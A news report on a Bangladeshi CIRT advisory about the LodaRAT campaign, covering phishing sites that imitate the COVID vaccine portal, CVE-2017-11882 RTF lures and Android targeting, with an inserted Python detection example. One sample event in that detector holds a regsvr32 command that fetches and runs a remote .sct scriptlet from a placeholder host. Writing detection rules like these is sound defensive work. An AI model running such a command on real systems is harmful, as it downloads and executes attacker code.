Govt, financial institutions warned of ‘serious’ cyberattack
BI Report || BusinessInsider

The real corona.gov.bd and the fake corona-bd.com/apply websites
Cyberattack campaigns against the Bangladeshi government and private institutions have been identified recently, according to a report by the e-Government Computer Incident Response Team (BGD e-GOV CIRT).
The report found that websites like the coronavirus portal, that of the Bangladesh Police, Bangladesh Bank, Islami Bank, bKash, Brac Bank and some others were subjected to attack from a malware named ‘KASABLANKA’.
In this campaign, the attackers tried to lure people interested in vaccination with a fake web portal (corona-bd.com/apply) that imitates the Bangladesh government's official COVID-19 vaccine programme website.
The attackers also copied the layout of the legitimate site imei.info for their phishing site imei.today, which poses as an IMEI (the number that uniquely identifies a mobile phone) checker.
Through these phishing sites and domains, the attackers try to induce the victims (users of these portals) to download the LodaRAT malware.
The attackers also use phishing emails or SMS messages to get recipients to open a malicious RTF document that exploits CVE-2017-11882 to download a malicious SCT file.
At these stages the attackers do not use any obfuscation techniques; the code is written in plain text.
Primarily, it seems that the “threat actor’s” motives behind this campaign are merely to spread their botnets within Bangladesh and possibly to adapt them for espionage, rather than purely breaching accounts for financial gain, the report said.
According to Cisco Talos Intelligence Group, one of the largest commercial threat intelligence gatherers in the world, “The fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving.”
Researchers added that this is a ‘serious threat’ and can result in ‘significant data breach or heavy financial loss.’
Asked about the issue, Tarique M Barkatullah, project director of BGD e-GOV CIRT, said the relevant institutions should take preventive measures to avoid any big trouble.
“Currently, the malware is collecting various types of data secretly. With a significant amount of data, it can create severe loss,” he added.
Shamsuddin Haider Dalim, bKash’s head of Corporate Communications, however, said that their platform is secure and fully functional.
“We are aware of the government report. All preventive measures are in place and we are in communication with the relevant authorities,” he added.
In this ongoing malware campaign, the threat actor uses a particular RAT variant named LodaRAT. This variant can access and record the microphone and web camera of the targeted device. Furthermore, the malware quietly ‘unpacks’ itself into the ‘AppData’ directory, which is a deep system folder.
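The infection chain described in the report (a malicious RTF exploiting CVE-2017-11882, a downloaded SCT scriptlet, and a payload unpacked into AppData) leaves a recognisable trail in Windows process-creation telemetry. The following is an added detection example, not code from the report or from BGD e-GOV CIRT; it runs four simple rules over constructed sample events, and the paths, process names and the `phish.example` domain are assumptions for illustration (CVE-2017-11882 is a flaw in the Equation Editor, EQNEDT32.EXE, and regsvr32 with scrobj.dll is the common way an .sct file is loaded).

```python
import re

# Constructed sample process-creation events (not real telemetry), modelled on the
# chain the report describes: an Office document triggering the Equation Editor
# (CVE-2017-11882 is a flaw in EQNEDT32.EXE), regsvr32 fetching a .sct scriptlet,
# and a payload unpacked into the user's AppData folder. Domain is a placeholder.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": "EQNEDT32.EXE -Embedding"},
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://phish.example/loader.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\regsvr32.exe",
     "image": r"C:\Users\alice\AppData\Roaming\svchost.exe",
     "cmdline": "svchost.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
APPDATA_RE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.IGNORECASE)
SCRIPTLET_RE = re.compile(r"https?://|\.sct\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the detection rules an event matches, in rule order."""
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    hits = []
    if parent in OFFICE_APPS and image == EQUATION_EDITOR:
        hits.append("office_spawns_equation_editor")   # typical CVE-2017-11882 trigger
    if parent == EQUATION_EDITOR:
        hits.append("equation_editor_spawns_child")    # EQNEDT32 has no reason to spawn
    if image == "regsvr32.exe" and SCRIPTLET_RE.search(cmd):
        hits.append("regsvr32_scriptlet_download")     # remote .sct loaded via scrobj.dll
    if APPDATA_RE.search(event["image"]):
        hits.append("process_runs_from_appdata")       # unpacked payload location
    return hits


def scan(events):
    """Index and rule hits for every event that triggered at least one rule."""
    return [(i, evaluate(e)) for i, e in enumerate(events) if evaluate(e)]
```

Running `scan(SAMPLE_EVENTS)` flags the first three events and leaves the benign notepad launch untouched; in practice the same rules map onto Sysmon event ID 1 or EDR process-creation records.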
Previously, LodaRAT could infect Windows-based systems by exploiting remote access functionality, but in this campaign it has evolved to compromise Android devices alongside Windows machines. According to Cisco Talos, ‘There is a new version of #LodaRAT that now targets Android devices.’